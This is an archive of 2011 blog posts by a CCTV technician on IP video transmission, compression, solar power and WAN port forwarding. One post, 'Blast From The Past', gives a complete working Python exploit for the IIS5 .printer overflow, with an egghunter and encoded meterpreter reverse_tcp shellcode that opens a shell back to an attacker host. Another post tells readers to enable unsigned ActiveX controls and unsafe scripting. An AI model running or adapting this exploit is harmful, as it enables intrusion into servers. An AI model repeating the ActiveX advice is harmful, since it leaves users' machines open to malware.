Sunday, August 14, 2011

IP CCTV transmission methods

There are essentially three ways of transmitting video streams over the network from the source to the destination: broadcast, unicast and multicast.

Broadcast
Broadcast is defined as a one-to-all communication between the source and the destinations. In IP video surveillance, the source refers usually to the IP camera and the destination refers to the monitoring station or the recording server. In this case, broadcasting would mean that the IP camera would send the video stream to all monitoring stations and recording servers, but also to any IP devices on the network, even though only a few specific destination sources had actually requested the stream. Typically, this method of transmission is not commonly used in IP video surveillance applications, but can be seen more often in the TV broadcasting industry where TV signals are switched at the destination level.

Unicast
Unicast is defined as a one-to-one communication between the source and the destination. Unicast transmissions are usually done in TCP or UDP and require a direct connection between the source and the destination. In this scenario, the IP camera (source) needs to have the capabilities to accept many concurrent connections when many destinations want to view or record that same video at the same time.
In terms of video streaming in unicast transmission, the IP camera will stream as many copies of the video feed requested by the destinations. In figure 1 below, three copies of the same video stream are sent over the network; one copy for each of the three destinations requesting the stream. If each video stream is 4 Mbps, this transmission will produce 12 Mbps (3x4Mbps) of data on multiple network segments.

As a result, many destinations connected in unicast to a video source can result in high network traffic. In other words, if we imagine a large system with 200 destinations requesting the same video stream, we would end up having 800 Mbps (200x4Mbps) of data travelling over the network, which is realistically unmanageable. Although this method of transmission is widely used over the Internet where most routers are not multicast-enabled, within a corporate LAN, unicast transmission is not necessarily the best practice as it can quickly increase the bandwidth needed for viewing and recording camera streams.

Multicast
In multicast transmission, there is no direct connection between the source and the destinations. The connection to the video stream of the IP camera is done by joining a multicast group, which in simple terms means actually connecting to the multicast IP address of the video stream. So the IP camera only sends a single copy of the video stream to its designated IP address and the destination simply connects to the stream available over the network with no additional overhead on the source. In other words, the destinations share the same video stream. In figure 2 below, the same three destinations requesting the video stream have the same impact on the network as a single destination requesting the stream in unicast and there is no more than 4 Mbps of data travelling on each segment of the network. Even with 200 destinations requesting that video stream, the same amount of data would be travelling on the network.

It is evident at this point that using multicast transmissions in an IP video surveillance application can save a lot of bandwidth, especially in large scale deployments where the number of destinations can grow very quickly.


Bandwidth optimisation for IP CCTV
When it comes to IP video surveillance, it is important to efficiently manage the way video streams are transmitted over the network in order not to overload the available bandwidth. Even though IT infrastructures are built to handle any kind of data, the applications generating traffic over the IP network need to be conducive with the efficient utilization of the network resources in place. To this end, different functionalities and mechanisms are offered by IP video surveillance solution providers to allow optimization of bandwidth and network resources such as:
• Multicasting
• Multistreaming
• Video compression

Even though the capacity and speed of the network are constantly increasing and its associated costs are declining, this is still not a good reason for users to ignore the additional investments and efforts needed to optimise bandwidth management. The amount of data travelling on the network is also still on the rise and therefore, investments in bandwidth optimization are ones that can contribute to a reduction in total cost of ownership, specifically in respect to efficiency gains and maximized resources.

For example, in video surveillance, more and more end-users are requesting cameras with higher picture quality and resolution, often opting for high-definition and megapixel cameras. These types of cameras require much more bandwidth than standard definition cameras. Also, more and more people inside as well as outside an organization’s walls are requesting access to video streams over the network. In the case where a large number of users are simultaneously trying to access a specific video stream, efficient use of network resources can be crucial in avoiding overloaded capacity and entire network crashes.
It is equally important to realize that optimizing the bandwidth on the network does not necessarily go hand in hand with large capital investments, but is more a matter of putting the right solutions in place and leveraging the unique and powerful capabilities of these solutions.

Saturday, August 13, 2011

Which Image Quality is Better

When thinking about maximizing image quality, resolution is usually the first thing that comes to mind. However, resolution is not the only factor that impacts quality. The amount of bandwidth available and used can have a dramatic impact on image quality. In this report, we examine bandwidth and the effect that it has on quality across numerous cameras.
Which Image Quality is Better?
To better understand image quality, let's start by examining two samples of the same scene side by side:
 
Consider two questions:
1. Which camera has higher resolution? A or B?
2. Which camera is better? A or B?
It is pretty obvious that the image from Camera B is better so this should be a simple case.
The reality is that those images are from the same camera at the same resolution and frame rate (720p/30). All that was done to the camera was changing the Constant Bit Rate target from 512 Kb/s to 8 Mb/s.
Factors Impacting Quality:
Even with the same resolution, two common settings impact quality: 
1. Bit Rate: Most cameras can have their bit rate adjusted to specific levels (e.g., 512 Kb/s, 2 Mb/s, 8Mb/s, etc.) 
2. Quantization Level: Most cameras can have the level of compression adjusted (often called a quality or compression setting with options from 1-10 or 0-100)
Typically, these are mutually exclusive. If you lock in bit rate, the camera will automatically adjust the quantization level to not exceed the bandwidth set. Vice versa, if you set the quantization level, the camera will automatically change the bandwidth consumed to make sure the quality / compression always stays at the same level.
Our Test Process
We wanted to better understand how changes in these two factors impact video quality. To do so, we did a series of tests with three HD cameras: the Axis P1344, the Sony CH140 and the Bosch NBN-921.
For the bandwidth tests, we tested each camera at the following levels:
  • 512 Kb/s
  • 1 Mb/s
  • 2 Mb/s
  • 4 Mb/s
  • 8 Mb/s
We did this across a series of scenes to see how quality would vary in different conditions:
  • Daytime Indoors (300 lux)
  • Nighttime Indoors (.5 lux)
  • Daytime Intersection
Finally, we did a similar series of tests varying the quality level of a VBR camera (the Axis across 0, 30, 60 and 100 levels) to better understand changes in quality and bandwidth consumption.

Sunday, July 24, 2011

How to Avoid Getting Hacked video

In 1995, a movie called Hackers debuted showing the life of a group of hackers and what kind of trouble they can cause. Hacking is still an ongoing problem today and as a result has crept into the security market through integrated information systems. In this article I’ll share some tips that can help you keep this cyber intrusion away from your home or business.

Generally, most technologically people get excited about the idea of being able to turn on lights, view security cameras, and control other gadgets at home with a Smart Phone. Unfortunately, there are criminals learning how to break into your systems despite increased security and better technology. So as you log in and review footage on your DVR or control feature of your Smart Home, a cyber thief could be following your every move. The best way to keep these so called cyber criminals from hacking into your system is to use encryption. If you leave any part of your system unencrypted, you’ve already created a huge vulnerability.

Many people in the residential market or in small businesses do not need to go to such extremes as encrypting video feeds. It may be necessary though if you’re trying to protect priceless property or have had issues in the past with people trying to steal certain items.

Some DVRs have a watermark feature to aid in preventing theft. This feature can help a viewer tell the difference between a genuine feed and a fake. I also recommend changing user names and passwords on a regular basis. You don’t want to leave your system with the factory defaults of admin/admin or 12345. Login information like this is what hackers are going to try first. Many customers have asked me to log into their systems and when I ask them what their user name and password is, they often respond saying, “I don’t know who set it up, I just have it saved to auto log in”. This is not a good practice and won’t keep your system secure. Remember if you want to keep your security system safe from hackers, you must, first, keep it safe from a 5 year old.

Monday, July 18, 2011

How to Selecting the right CCTV video compression

If you are responsible for planning or designing a new CCTV video surveillance system, you have to make a technology choice regarding which video compression technique to use.

For sure, it will be digital. But which video compression scheme is the most suitable for your application?

1. Motion JPEG CCTV video compression
The JPEG standard was developed by the Joint Photographic Expert Group (part of ISO) for efficient storage of individual frames. Motion JPEG or M-JPEG is a series of separate JPEG images that form a video sequence. When 16 JPEG image frames or more are joined together per second, the result is an illusion of motion video. Video reproduction at 30 frames per second (FPS) for NTSC signals or 25 FPS for PAL signals is called full motion video or continuous-motion video.

Although Motion JPEG is an unlicensed standard it is widely compatible with many applications that require low frame rates or technologies such as Video Analytics where frame by frame analysis is crucial.

Advantages
1. Ability to support multi-mega pixel resolution.
2. Ideal for courtroom single frame evidence.
3. Clearer images at lower frame rates than MPEG-4.
4. Frame by frame playback offers more frames to view.
5. Technology is simpler; this can reduce the cost of a camera or video codec.
6. At low bandwidth priority is given to Image Resolution.
Disadvantages
1. High bit rate for scenes with little or no activity increases bandwidth and storage.
2. Video quality deteriorates at higher compression ratios.
3. No M-JPEG standard often means incompatibility issues.
4. Converting M-JPEG into another format reduces video quality.
5. Dated technology superseded by more bandwidth-efficient encoding techniques.

MPEG-4 CCTV video compression
MPEG-4 is a compression standard that was introduced in late 1998 by the Moving Picture Experts Group. In video surveillance applications MPEG-4 Part 2, also known as MPEG-4 Visual is the version of MPEG-4 most commonly used. MPEG-4 supports both low-bandwidth applications and those applications that require high quality images, with virtually unlimited bandwidth and no limitations in frame-rate. Typically most MPEG-4 based encoders and cameras support video up to DVD quality.

MPEG-4 is much more efficient than M-JPEG because video frames are analysed prior to being sent across the network. The first compressed image (I frame) is used as a reference point, the following images only contain information that differs to the initial I frame reference image. Periodically I frames are transmitted within the video sequence to ensure a recent reference point. The distance between these I frames is known as the GOP (Group of Pictures). The distance between I frames is usually user definable depending on the application and activity in the scene. For example a 25 FPS video stream with a GOP of 50 would mean a new I frame with GOP change information is sent every 2 seconds. The viewing application on the receiving end of the transmission then reconstructs all images based on this information and displays the video.

Advantages
1. MPEG-4 up to 5 times more efficient than M-JPEG at low bandwidths.
2. Increases the amount of time video can be stored compared with M-JPEG.
3. Uses less network bandwidth when compared with M-JPEG.
4. Very efficient at high frame rates.
Disadvantages
1. When the bit-rate is limited video quality suffers.
2. Low efficiency at very low frame-rates or extremely high scene activity.
3. Can be liable to “blurring” on freeze frame or very high motion.

H.264 CCTV video compression
H.264 is the latest MPEG standard for video encoding that is geared to take video beyond the realms of DVD quality by supporting Hi Definition CCTV video. H.264 can also reduce the size of digital video by more than 80% compared with M-JPEG and as much as 50% with MPEG-4, all without compromising image quality. This means that much less network bandwidth and storage space are required. Since the typical storage costs for surveillance projects represent between 20 and 30 percent of the project cost significant savings can be made.

Like many sectors of our industry, the devil is in the detail and system integrators and end-users who wish to see the benefits of an IP-based solution should look to someone who really knows the technology and can give an impartial view. It is common sense that manufacturers will only support their own hardware and will promise the earth for it, whereas a distributor will have evaluated a number of solutions from different vendors and be able to say that product A is the best for solution B because of XYZ whereas product Y is the best for solution C because of etc etc.

Advantage
1. H.264 cameras is that they reduce the amount of bandwidth needed.if your megapixel camera needed 10 Mb/s before (with MJPEG), it might now need only 1.5 Mb/s. So for each camera, you will save a lot of bandwidth.
2. Eliminates barriers: Enables many more networks to support megapixel cameras.
3. The bitstream is fully compatible with existing decoders with no error/drift.
Disadvantages
1. Using analytics with these cameras reduces the H.264 benefit.
2. Costs few hundred dollars more per camera.

Saturday, July 16, 2011

Active X & Direct X Troubleshooting for Windows 2000 & XP

Time by Time I got call from Technician/Engineers/Sr. Engineers/Managers says” Hi Arindam I got your ref from XYZ actually we facing problem with Active X Component installing on Windows XP PC/Laptop “. Yes many sites in India on the Internet use Active X or Direct X controls to display web content. If you are having the following issues, the below instructions offer possible solutions. Before applying this you must knowing PC administrator Password.



Issues:
  • Active X or Direct X Will Not Load
  • WINXP IE Service Pack 2 Not Allowing Load
The following applies to Windows 2000 and Windows XP, and is meant to be used by experienced PC users ONLY.
  • Open Internet Explorer, click on Tools, click on Internet Options
  • Click on the Security Tab
  • Click to Highlight Internet, click Custom Level button
    • .NET framework-Run Authenticode not signed—click to ENABLE
    • Run components signed with Authenticode—- click to ENABLE
    • ActiveX controls and plug-ins
      • Automatic prompting for ActiveX controls—- click to ENABLE
      • Binary and scripting behaviors—- click to ENABLE
      • Download signed ActiveX controls—- click to ENABLED
      • Download unsigned ActiveX controls—- click to ENABLED
      • Init and script ActiveX controls not marked as safe—- click to ENABLED
      • Run ActiveX controls and plug-ins—- click to ENABLE
      • Script ActiveX controls marked safe for scripting—- click to ENABLED
  • Downloads
    • Auto prompt for downloads—- click to DISABLE
    • File downloads— click to ENABLE
    • Font download—- click to ENABLE
  • Java VM
    • Java permissions—— click to HIGH SAFETY
    • Access data sources across domains—- click to DISABLE
    • Allow META REFRESH—- click to ENABLE
    • Allow scripting of IE web-browser controls—- click to DISABLE
    • Allow scripting of windows without size or position—- click to DISABLE
    • Allow web pages to use restricted protocols for active— click to PROMPT
    • Display mixed content—– click to PROMPT
    • Don’t prompt for client certificate selection —— click to DISABLE
    • Drag and drop or paste files—– click to ENABLE
    • Installation of desktop items—-PROMPT
    • Launch programs and files in an IFRAME—- click to PROMPT
    • Navigate sub-frames across different domains— click to ENABLE
    • Open files based on content, not file extensions—- click to ENABLE
    • Software channel permissions—– click to MEDIUM SAFETY
    • Submit non-encrypted form date—- click to ENABLE
    • Use Pop-Up blocker—- click to ENABLE
    • User data persistence—– click to ENABLE
    • Web site in less privileged web content zone can navigate—- click to ENABLE
  • Scripting
    • Active scripting—– click to ENABLE
    • Allow paste operations via script—– click to ENABLE
    • Scripting of Java applets—- click to ENABLE
  • User Authentication
    • Logon
      • click to Automatic logon only in Intranet zone

Saturday, June 25, 2011

Components of a stand alone solar PV system for CCTV System


Sunlight to Electricity is photovoltaic technology converts sunlight into electricity and is emerging as a major power source for CCTV due to its numerous environmental and economic benefits and proven reliability. Enough free sunlight falls on earth to supply our energy needs for years to come.
Environmental Benefits: As PV generates electricity from light, PV produces no air pollution or hazardous waste. It doesn't require liquid or gaseous fuel to be transported or combusted.


Economic and Social Benefits: Sunlight is free and abundant. A photovoltaic system allows you to generate electricity and store it for use when needed. Photovoltaic contributes to our energy security, as a young technology, it creates jobs and strengthens the economy. It frees us from uncertainties and foreign oil dependence.

This energy source is free, clean and highly reliable. PV systems are long-lasting and require little maintenance. The benefits of Photovoltaic’s far outweigh the initial cost the systems.

Solar Panels (PV) Modules
The DC electricity produced by the solar panel or module(s) is used to charge batteries via a solar charge controller. Any DC appliances that are connected to the battery will need to be fused.  DC lights are normally connected to the charge controller. Any AC appliances are powered via an inverter connected directly to the batteries. NOTE: inverters used in grid tie and stand alone systems are different and should not be interchanged.
Most stand alone PV systems need to be managed properly. Users need to know the limitations of a system and tailor energy consumption according to how sunny it is and the state of charge (SOC) of the battery.
Configuration
The solar panels need to be configured to match the system DC voltage, which is determined by the battery. System voltages are typically, 12V DC and 24V DC, larger systems will operate at 48V DC.
The operating voltage of a solar panel in a stand-alone system must be high enough to charge the batteries. For example, a 12V battery will require 14.4V to charge it. The solar panel must be able to deliver this voltage to the battery after power losses and voltage drop in the cables and charge controller and in conditions in which the solar cells operate at a high temperature. A solar panel with a Voc of about 20V is required to reliably charge a 12V battery.
Charge Controllers (Solar controller (or solar regulator))
A charge controller is designed to protect the battery and ensure it has a long working life without impairing the system efficiency. Batteries should not be overcharged and the function of the charge controller is to ensure that the battery is not over charged.
  • Charge controllers are designed to function as follows:
  • Protect the battery from over-discharge, normally referred to as low voltage disconnect (LVD) that disconnects the battery from the load when the battery reaches a certain depth of discharge (DOD).
  • Protect the battery from over-charging by limiting the charging voltage - this is important with sealed batteries - it is usually referred to as high voltage disconnect (HVD).
  • Prevent current flowing back into the solar panel during the night, so called reverse current.

NOTE: controllers with MPP tracking will ensure that the solar modules operate at optimal rating and can increase output by 10% or more.
Batteries
The power requirements of stand alone pv systems are rarely in sync with the battery charging. Appliances and loads need to be powered when there is sufficient solar radiation, during overcast weather and during the night. Bad weather may last for several days and the daily charging and discharging of the batteries takes its toll on them. Batteries that are able to handle the constant charging and discharging are known as deep cycle batteries. Batteries need to have a good charging efficiency, low charging currents and low self-discharge.
Battery Ah Efficiency
The Ah efficiency of a battery describes the relationship between Ah that are put into the battery and the Ah that are taken out. Under ideal conditions a new deep-cycle battery would be 90% efficient.
Choosing the most appropriate battery
The important characteristics to look for are:
  • capacity
  • cycle life
  • price / performance
  • size and space requirements
  • Ah efficiency
  • self-discharge rate
  • installation - vertical or horizontal
  • environmental - will batteries be placed near water supplies or in wildlife parks etc

Friday, June 10, 2011

Blast From The Past

Hi visitor I am from Kolkata, India. Its very simple and short Tutorial on my personal exp.
Recently on a test I ran into a windows 2000 server running iis5 with the Internet Printing module enabled, I was quite surprised by this but...a shell is a shell right? Since this was on the job and I wasn't wearing my cowboy hat I fired up my windows 2000 VM (who doesn't have one of those?) and went to work. Metasploit has a module for this vuln (exploit/windows/iis/ms01_023_printer) but surprisingly it is pretty flakey. On the first run of the exploit module it did not work so I took a look at my configuration of IIS again to make sure that everything was setup properly. After confirming IIS settings I tried the module a couple more times and finally was able to get a shell. I restarted IIS and tried the module a few more times...it was still hit or miss - sometimes it would work on the first try sometimes it would take three tries, something was strange....

After breaking out immunity debugger it became clear as to why the exploit did not work everytime. According to the metasploit module the shellcode was being held at an offset of EBX and with a short assembly stub we jump to that location (see metasploit snippet below)

buf = make_nops(280)
buf[268, 4] = [target.ret].pack('V')

# payload is at: [ebx + 96] + 256 + 64
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]
buf << "\x80\xc1\x40" # add cl, 64
buf << "\x80\xc5\x01" # add ch, 1
buf << "\xff\xe1" # jmp ecx

sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

While this does work, it appears that sometimes the payload is not within the window and the exploit is not successful. Since we know about where in memory our payload will be when we gain control of EIP seems like a good place to use an egghunter :) I started out with an existing egghunter(http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf) and modified it a little since I know about where in memory my payload is there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check...I had plenty of bytes to burn ;) -

mov edx, ebx #ebx is the area of our starting point
or dx, 0fff
xor dx,0fff #clear out the bottom half of edx for the start of our loop
inc edx #increment edx - this is the start of our loop
nop #abbreviated nops where the original access violation check was
...
...
mov eax, 57303054 #load our egg "W00T"
mov edi, edx #set edi to point at our current location in memory
scas dword ptr es:[edi] #compare our egg to dword at edi
jnz #jump back to the start of our loop (inc edx) if we didnt find the egg
scas dword ptr es:[edi] #compare our egg to the next dword for the 2nd part of the egg
jnz #jump back to the start of our loop (inc edx) if we didnt find the 2nd egg
jmp edi #jump to edi as it points to the first byte after our egg
After implementing the egghunter into the exploit I had no issues getting a shell everytime :)

Full exploit below - obviously will have to change the shellcode for it to work for you -

import urllib2
import sys

shell= "T00WT00W"
shell +="\x90"*(10)

########################################################################################################
# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.170.1 R|msfencode -e x86/alpha_upper -t c #
########################################################################################################
shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45"
"\x50\x45\x50\x45\x30\x4d\x59\x4a\x45\x50\x31\x4e\x32\x45\x34"
"\x4c\x4b\x46\x32\x50\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b\x51"
"\x42\x44\x54\x4c\x4b\x43\x42\x46\x48\x44\x4f\x4f\x47\x50\x4a"
"\x46\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x47\x4c\x43"
"\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x49\x51\x48\x4f\x44\x4d"
"\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32\x51\x47\x4c\x4b\x50"
"\x52\x42\x30\x4c\x4b\x47\x32\x47\x4c\x45\x51\x48\x50\x4c\x4b"
"\x47\x30\x42\x58\x4b\x35\x4f\x30\x42\x54\x51\x5a\x43\x31\x4e"
"\x30\x50\x50\x4c\x4b\x47\x38\x42\x38\x4c\x4b\x46\x38\x51\x30"
"\x45\x51\x49\x43\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x47\x44\x4c"
"\x4b\x43\x31\x4e\x36\x50\x31\x4b\x4f\x46\x51\x49\x50\x4e\x4c"
"\x49\x51\x48\x4f\x44\x4d\x45\x51\x48\x47\x47\x48\x4d\x30\x42"
"\x55\x4b\x44\x44\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46\x44"
"\x44\x35\x4a\x42\x50\x58\x4c\x4b\x50\x58\x46\x44\x45\x51\x49"
"\x43\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c"
"\x43\x31\x49\x43\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x48\x50\x4d"
"\x59\x51\x54\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x46\x39"
"\x51\x4a\x46\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c"
"\x4b\x42\x32\x4a\x4b\x4b\x36\x51\x4d\x42\x48\x46\x53\x46\x52"
"\x43\x30\x43\x30\x43\x58\x42\x57\x42\x53\x47\x42\x51\x4f\x50"
"\x54\x43\x58\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x49\x45"
"\x48\x38\x4a\x30\x45\x51\x45\x50\x45\x50\x46\x49\x49\x54\x50"
"\x54\x50\x50\x45\x38\x46\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f"
"\x48\x55\x46\x30\x50\x50\x46\x30\x46\x30\x47\x30\x46\x30\x51"
"\x50\x46\x30\x42\x48\x4b\x5a\x44\x4f\x49\x4f\x4d\x30\x4b\x4f"
"\x49\x45\x4a\x37\x42\x4a\x43\x35\x45\x38\x4f\x30\x49\x38\x4f"
"\x5a\x43\x31\x45\x38\x44\x42\x43\x30\x42\x31\x51\x4c\x4c\x49"
"\x4a\x46\x43\x5a\x42\x30\x50\x56\x51\x47\x43\x58\x4a\x39\x49"
"\x35\x43\x44\x43\x51\x4b\x4f\x48\x55\x4d\x55\x4f\x30\x43\x44"
"\x44\x4c\x4b\x4f\x50\x4e\x43\x38\x44\x35\x4a\x4c\x45\x38\x4a"
"\x50\x48\x35\x4f\x52\x50\x56\x4b\x4f\x48\x55\x43\x5a\x43\x30"
"\x43\x5a\x44\x44\x46\x36\x51\x47\x42\x48\x45\x52\x4e\x39\x4f"
"\x38\x51\x4f\x4b\x4f\x48\x55\x4c\x4b\x47\x46\x43\x5a\x51\x50"
"\x42\x48\x45\x50\x42\x30\x43\x30\x43\x30\x50\x56\x42\x4a\x45"
"\x50\x45\x38\x50\x58\x4e\x44\x46\x33\x4b\x55\x4b\x4f\x49\x45"
"\x4a\x33\x46\x33\x43\x5a\x43\x30\x50\x56\x51\x43\x50\x57\x42"
"\x48\x44\x42\x48\x59\x4f\x38\x51\x4f\x4b\x4f\x4e\x35\x45\x51"
"\x49\x53\x51\x39\x49\x56\x4d\x55\x4c\x36\x43\x45\x4a\x4c\x4f"
"\x33\x44\x4a\x41\x41")


egghunter="\x8B\xD3\x66\x81\xCA\xFF\x0F\x66\x81\xF2\xFF\x0F\x42\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x54\x30\x30\x57\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"


buff = 'A'*268 + '\x4d\x3f\xe3\x77' +"\x90"*5 + egghunter + '\x90'*156
useragent = 'Shit Bird'
header = {'User-Agent':useragent, 'Host':buff}

req = urllib2.Request('http://'+sys.argv[1]+'/NULL.printer?'+shell,headers = header)
res = urllib2.urlopen(req)
res.close()

Saturday, June 4, 2011

How do I setup IP forwarding/filtering with the Connect WAN

Introduction
The WAN supports four features which provide security and IP traffic forwarding when using incoming or Mobile Terminated connections:
1.      Network Address Translation (NAT)
2.      Generic Routing Encapsulation (GRE) forwarding
3.      TCP/UDP port forwarding
4.      IP Filtering
This document describes each function, how they are used in conjunction with each other, how they are used, and what issues can occur with each if not used properly.

Network Address Translation (NAT)
NAT allows the Connect WAN to have a single public IP address on the mobile link, while allowing multiple private IP addressed devices connected to the Ethernet interface. 
Outgoing traffic (mobile initiated) from the private network to the public mobile network assumes the IP address of the public mobile interface.  An internal table tracks which internal IP address made the outgoing request so that responses get sent to the proper requestor.
For example, a workstation at IP address 192.168.1.15 sends a request to www.arindamcctvaccesscontrol.blogspot.com.  The source IP address is changed by the Connect WAN address translation to the public 
Incoming (mobile terminated) traffic is either designated to the Connect WAN itself (i.e. HTTP or telnet connections for configuration or monitoring), or is forwarded to hosts via the Ethernet interface based either on GRE or TCP/UDP port forwarding which is covered below.
NAT provides two main benefits:
1.      Security: NAT hides the Private IP addresses of the devices on the Connect WAN''''s Ethernet network.
2.      IP Address Availability: IP addresses are in short supply and cost money.  The Connect WAN need be provided only one IP address from the wireless carrier.
NAT is enabled by default on the Connect WAN.  It should not be disabled unless there is a specific reason to do so.

Generic Routing Encapsulation (GRE) forwarding
GRE is a transport layer protocol, designated as IP protocol number 47, is used by many routers, WAN switches and VPN concentrators, to effectively tunnel traffic over a WAN between routers.  Note that GRE itself provides no encryption but protocols such as PPTP can use GRE.  IPSec can be encapsulated in GRE (and vice-versa).  GRE uses IP-in-IP and allows private IP addresses to be tunneled through a public network.

The Connect WAN provides a simple checkbox to turn on GRE forwarding to pass GRE traffic from the mobile interface through to a router on the Ethernet interface.  Note the Connect WAN only passes GRE traffic and does not terminate it.
Here is an example diagram:
Figure 1 - GRE Forwarding
The HQ router''s peer GRE address is the mobile IP address of the Connect WAN, which in this case is 166.213.229.218.  The Connect WAN has GRE forwarding enabled and will send to the router''s Ethernet WAN port, in this case 192.168.1.2.  Typically this connection is a directly connected Ethernet cable.
An example similar to the above is where GRE tunneling is used to create a backup WAN connection to a primary Frame Relay connection through the Connect WAN and wireless network. 

TCP/UDP Port Forwarding
Normally, traffic initiated from a host site to a Connect WAN is blocked by NAT, unless the traffic is destined for the Connect WAN itself.  Port forwarding provides a means to pass traffic from the mobile interface to devices connected to the Connect WAN''''s Ethernet port.  There are two main applications where port forwarding is required:
1.      Pass application data traffic, such as polls or requests, to Ethernet connected devices, and
2.      Pass VPN traffic, such as IPSec-in-UDP, through to routers or VPN appliances.
For example, three devices are attached to the Connect WAN''''s Ethernet port:
Figure 2 - TCP Port Forwarding
The application uses a protocol that polls the devices using the device IP address and TCP port 502 (which is Modbus).  On local LANs and publicly routable IP addresses this is not a problem. 
NAT hides the private Ethernet IP addresses of the devices connected behind the Connect WAN''''s Ethernet port.  The application can then only send polls to one IP address the mobile IP in this case 166.213.229.218. 
TCP port forwarding is used to forward the IP polls to one or more devices on the Connect WAN Ethernet port.  Different TCP port numbers are used to designate which device gets the proper traffic. The application must be able to support changing the TCP protocol port number from the default of 502.  In this case the application is configured to poll according to this table:
Remote Device
Destination IP Address
Destination TCP Port
One
163.213.229.218
12001
Two
163.213.229.218
12002
Three
163.213.229.218
12003
Notice the destination IP address is the Connect WAN''''s mobile IP address.
The Connect WAN is configured with a TCP/UDP forwarding table as follows:
Source TCP Port
Destination IP Address
Destination TCP Port
12001
192.168.1.2
502
12002
192.168.1.3
502
12003
192.168.1.4
502
Incoming traffic is then routed to the proper device.  The devices can use their standard TCP port of 502.
The main issue with port forwarding in this case is when the polling application does NOT allow the user to specify the TCP or UDP port used.  The workaround is to use routers that support GRE, VPN, or other forms of tunneling that can be forwarded through the Connect WAN.
Another example of port forwarding is forwarding of IPSec-in-UDP traffic to a VPN appliance or router attached to the Connect WAN''''s Ethernet port.  Figure 1 above shows a GRE tunnel.  In much the same way, IPSec traffic can be encapsulated in UDP to prevent NAT from modifying the IPSec headers (which would invalidate the traffic).  IPSec-in-UDP implementations always use UDP port 500 for IKE/ISAKMP, but can use various UDP port numbers for the AH/ESP traffic.  Here is an example of UDP port forwarding entries on a Connect WAN for IPSec in UDP:
Protocol
Source Port
Destination IP Address
Destination Port
UDP
500
192.168.1.2
500
UDP
4500
192.168.1.2
4500

IP Filtering
IP Filtering is a security feature that allows the user to block all incoming, mobile terminated traffic into the Connect WAN except for traffic from specific IP addresses and/or subnets.  There are three IP Filtering settings on the Connect WAN:
1.      Only allow access from the following devices and networks.  When checked this blocks ALL incoming traffic except for the traffic from the IP address/subnets listed in the "allow access" tables.
2.      Automatically allow access from all devices on the local subnet.  This allows out-bound traffic from the private Ethernet network out to the mobile network and beyond.
3.      Allow access from the following devices and/or subnets.  When the "Only allow access from the following devices and networks" box is checked, you must provide entries here to allow in-coming mobile traffic to be passed through the Connect WAN.
CAUTION: Incorrect settings here can stop some or all traffic.  For example, checking "Only allow access from the following devices and networks" without adding IP addresses or subnets to the "allow access" tables will block ALL incoming traffic, even responses from outgoing requests.